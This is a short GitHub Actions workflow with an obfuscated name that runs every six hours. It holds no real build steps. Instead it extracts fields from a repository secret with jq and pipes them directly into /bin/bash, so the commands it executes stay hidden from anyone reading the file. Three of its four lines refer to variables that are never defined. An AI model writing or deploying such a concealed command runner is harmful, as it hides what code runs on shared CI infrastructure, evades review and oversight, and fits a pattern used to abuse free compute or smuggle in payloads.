name: huojiaquan3627

on:
  workflow_dispatch:
  schedule:
    - cron: '1 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huojiaquan3627
        env:
          mt9: ${{ secrets.mt9 }}
        run: |
          echo $mt9 | jq -r .dakwx12 | /bin/bash
          echo $ipu96 | jq -r .eon5902 | /bin/bash
          echo $kit10 | jq -r .gkeqe171 | /bin/bash
          echo $u1 | jq -r .joxq5 | /bin/bash

